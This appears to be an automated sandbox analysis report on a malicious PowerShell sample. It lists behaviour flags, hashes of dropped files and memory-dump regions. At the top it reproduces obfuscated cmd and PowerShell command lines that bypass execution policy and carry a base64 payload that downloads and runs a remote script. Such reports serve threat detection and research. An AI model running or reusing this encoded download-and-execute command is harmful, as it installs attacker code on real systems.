C:\Windows\system32\cmd.execmd /C powershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA2⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA3⤵
- Blocklisted process makes network request
- Drops file in Program Files directory
- Drops file in Windows directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
Network
MITRE ATT&CK Matrix ATT&CK v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Local\Temp\RES6D27.tmpMD5
265781461bd3699d32def7a26bf20ca6
SHA1fba089c250f1712a5474ef73e562e145d8bb70a1
SHA256eb78a1266e7a793b274a6cb70c2ad227fd5f680f5f5288698a57f980cb240085
SHA51247907712aa99a3c6224b3c31d9054b8f374560a4e4d1c72cfce75448cb9d36c1eea61b4430dce2175b956299220954f31a183e9198fddb007b8393983eea5d8f
-
C:\Users\Admin\AppData\Local\Temp\kuijob3s\kuijob3s.dllMD5
a9981347d273073186b0845494e154a4
SHA1fc0cbb5b8532db34198eb41c4ff16bebbb85ba54
SHA256ba9056f883562b52279660e0936afa214ca6b40a6af0efd64eaee466b057479b
SHA51283f7dbc80197edcf170d3c766c2eaaebba5be43f9818763493aa90efc02e68c3917b2c67eddb6f5d8ac90399e660a3e58d3b2bfe311d948bf72c98bff1b96a8b
-
C:\Users\Admin\AppData\Local\Temp\ready.ps1MD5
3447df88de7128bdc34942334b2fab98
SHA1519be4e532fc53a7b8fe2ae21c9b7e35f923d3bb
SHA2569520067abc34ce8a4b7931256e4ca15f889ef61750ca8042f60f826cb6cb2ac9
SHA5122ccf6c187c3e17918daadd1fc7ca6e7dfaf6b958468a9867cca233e3506906164dfeb6104c8324e09d3058b090eab22417695b001ddb84f3d98562aec05eb78f
-
C:\Users\Admin\AppData\Local\Temp\resolve-domain.PS1MD5
7cc73f9b87540e85212f709eafca7ea8
SHA13f43a1e1044dfb8d3354f055a5461d265719fa0e
SHA2567147ad654973c344899b83fc6cf91fcc9ff39a83b5ef5d8521239fd2a37f8df5
SHA512c47acb6bed89647059b4a9ef052d4414d79697658c8f7d851ff84f3c64f2e7ce9631525db439a1279a8622d2ed74d838cef48fd235701d98d5da6a8c0f83dea3
-
\??\c:\Users\Admin\AppData\Local\Temp\kuijob3s\CSC4856BA9160684051B4EC1A7082BC632F.TMPMD5
b0b89925dbbeddc09c6af070ed3b73eb
SHA187fb0c632e90495b8e0beb1913db9228f8702e72
SHA2561a095a8e9ed711a5570eae6eca259a0bcd64a42e75c3bd8bf9a3984c0fb89880
SHA5122e31c1b2f4f98a51e500bad8eebfb0b001e908374eb9a9afbb8381df3d90d8d1966b5387ad210745fab841f24b8f744b8ebde308717efa59c8604820866e88b3
-
\??\c:\Users\Admin\AppData\Local\Temp\kuijob3s\kuijob3s.0.csMD5
4864fc038c0b4d61f508d402317c6e9a
SHA172171db3eea76ecff3f7f173b0de0d277b0fede7
SHA2560f5273b8fce9bfd95677be80b808119c048086f8e17b2e9f9964ae8971bd5a84
SHA5129e59e8bee83e783f8054a3ba90910415edacfa63cc19e5ded9d4f21f7c3005ca48c63d85ce8523a5f7d176aa5f8abafc28f824c10dbfb254eed1ce6e5f55bf31
-
\??\c:\Users\Admin\AppData\Local\Temp\kuijob3s\kuijob3s.cmdlineMD5
cf56bdd57ce7b23167c75f86621d309a
SHA148a945bd148d833cc5f7b5c8d9e24cc625ebf5e8
SHA25612d0f2ff7aaadc6fa960ed98cba20b02fb33cd0e790856cbe23cdff10899eab0
SHA512571e6ab9fd7172eb5906cd227fcc4fbb79449c45c39e537699bb9e8d9127f1eb993ead99d067eeb6cc3060d655d6d411331dfb07d54f594a145759b4caa0c790
-
\Windows\Branding\mediasrv.pngMD5
590ae32e6e9072e2b0ad71650d787af9
SHA10ab159b2b34b3ebcfdef8e9857fcd09605bbb0c7
SHA25642d111d512d35fc3ae7a82399ee2cb9403836ddc676237c16a73cba14e7e72bc
SHA5122b89db1d9229c9baa3cee7700609004cb0313d85886b7652500ba0c6ddee3aa80c39ea6e39ad84f3dba4527e202cf639068d26d93a004a25e90e69d14766179b
-
\Windows\Branding\mediasvc.pngMD5
c4184e993992dc9b9bb7d2b536311f98
SHA1fa3a97ac00dbdc7db025d40edf8013cc74d2244f
SHA25681bd39baea5ba98b725f2362f09c41550bb768da73f174ef032e1a6b6318c6f6
SHA512d10f9f40da51ca5a71fa473d5521d103dfa55e681b72e789627b8406e3b7158a9621a6a233b1dab905823f4335c1aba27fd5d819f61179227b8ede17ba5f4c19
-
memory/188-234-0x0000000000000000-mapping.dmp
-
memory/1156-171-0x000001C3BBFE3000-0x000001C3BBFE5000-memory.dmpFilesize
8KB
-
memory/1156-191-0x000001C3BBFE6000-0x000001C3BBFE8000-memory.dmpFilesize
8KB
-
memory/1156-170-0x000001C3BBFE0000-0x000001C3BBFE2000-memory.dmpFilesize
8KB
-
memory/1156-160-0x0000000000000000-mapping.dmp
-
memory/1240-237-0x0000000000000000-mapping.dmp
-
memory/1240-232-0x0000000000000000-mapping.dmp
-
memory/1252-240-0x0000015000530000-0x0000015000532000-memory.dmpFilesize
8KB
-
memory/1252-243-0x0000015000538000-0x0000015000539000-memory.dmpFilesize
4KB
-
memory/1252-239-0x0000000000000000-mapping.dmp
-
memory/1252-241-0x0000015000533000-0x0000015000535000-memory.dmpFilesize
8KB
-
memory/1252-242-0x0000015000536000-0x0000015000538000-memory.dmpFilesize
8KB
-
memory/1832-204-0x000001EAC88E6000-0x000001EAC88E8000-memory.dmpFilesize
8KB
-
memory/1832-221-0x0000000000000000-mapping.dmp
-
memory/1832-200-0x0000000000000000-mapping.dmp
-
memory/1832-201-0x000001EAC88E0000-0x000001EAC88E2000-memory.dmpFilesize
8KB
-
memory/1832-202-0x000001EAC88E3000-0x000001EAC88E5000-memory.dmpFilesize
8KB
-
memory/1832-205-0x000001EAC88E8000-0x000001EAC88EA000-memory.dmpFilesize
8KB
-
memory/1916-211-0x0000000000000000-mapping.dmp
-
memory/2064-236-0x0000000000000000-mapping.dmp
-
memory/2084-212-0x0000000000000000-mapping.dmp
-
memory/2088-217-0x0000000000000000-mapping.dmp
-
memory/2104-224-0x0000000000000000-mapping.dmp
-
memory/2104-231-0x0000000000000000-mapping.dmp
-
memory/2104-210-0x0000000000000000-mapping.dmp
-
memory/2144-227-0x0000000000000000-mapping.dmp
-
memory/2180-244-0x0000000000000000-mapping.dmp
-
memory/2284-140-0x0000000000000000-mapping.dmp
-
memory/2284-214-0x0000000000000000-mapping.dmp
-
memory/2352-218-0x0000000000000000-mapping.dmp
-
memory/2388-229-0x0000000000000000-mapping.dmp
-
memory/2528-245-0x0000000000000000-mapping.dmp
-
memory/2664-216-0x0000000000000000-mapping.dmp
-
memory/2664-235-0x0000000000000000-mapping.dmp
-
memory/2724-213-0x0000000000000000-mapping.dmp
-
memory/2804-230-0x0000000000000000-mapping.dmp
-
memory/2808-144-0x000001D4F7D70000-0x000001D4F7D71000-memory.dmpFilesize
4KB
-
memory/2808-151-0x000001D4F8610000-0x000001D4F8611000-memory.dmpFilesize
4KB
-
memory/2808-146-0x000001D4F7DC6000-0x000001D4F7DC8000-memory.dmpFilesize
8KB
-
memory/2808-152-0x000001D4F89A0000-0x000001D4F89A1000-memory.dmpFilesize
4KB
-
memory/2808-120-0x0000000000000000-mapping.dmp
-
memory/2808-126-0x000001D4F7D00000-0x000001D4F7D01000-memory.dmpFilesize
4KB
-
memory/2808-129-0x000001D4F8130000-0x000001D4F8131000-memory.dmpFilesize
4KB
-
memory/2808-130-0x000001D4F7DC0000-0x000001D4F7DC2000-memory.dmpFilesize
8KB
-
memory/2808-153-0x000001D4F7DC8000-0x000001D4F7DC9000-memory.dmpFilesize
4KB
-
memory/2808-131-0x000001D4F7DC3000-0x000001D4F7DC5000-memory.dmpFilesize
8KB
-
memory/3024-208-0x0000027359FA6000-0x0000027359FA8000-memory.dmpFilesize
8KB
-
memory/3024-206-0x0000027359FA0000-0x0000027359FA2000-memory.dmpFilesize
8KB
-
memory/3024-203-0x0000000000000000-mapping.dmp
-
memory/3024-207-0x0000027359FA3000-0x0000027359FA5000-memory.dmpFilesize
8KB
-
memory/3104-238-0x0000000000000000-mapping.dmp
-
memory/3796-215-0x0000000000000000-mapping.dmp
-
memory/3808-233-0x0000000000000000-mapping.dmp
-
memory/3872-226-0x0000000000000000-mapping.dmp
-
memory/3896-114-0x000001D77DB50000-0x000001D77DF71000-memory.dmpFilesize
4.1MB
-
memory/3896-119-0x000001D77D716000-0x000001D77D717000-memory.dmpFilesize
4KB
-
memory/3896-118-0x000001D77D715000-0x000001D77D716000-memory.dmpFilesize
4KB
-
memory/3896-117-0x000001D77D713000-0x000001D77D715000-memory.dmpFilesize
8KB
-
memory/3896-116-0x000001D77D710000-0x000001D77D712000-memory.dmpFilesize
8KB
-
memory/3900-209-0x0000000000000000-mapping.dmp
-
memory/3908-228-0x0000000000000000-mapping.dmp
-
memory/3924-220-0x0000000000000000-mapping.dmp
-
memory/4040-225-0x0000000000000000-mapping.dmp
-
memory/4052-219-0x0000000000000000-mapping.dmp
-
memory/4068-137-0x0000000000000000-mapping.dmp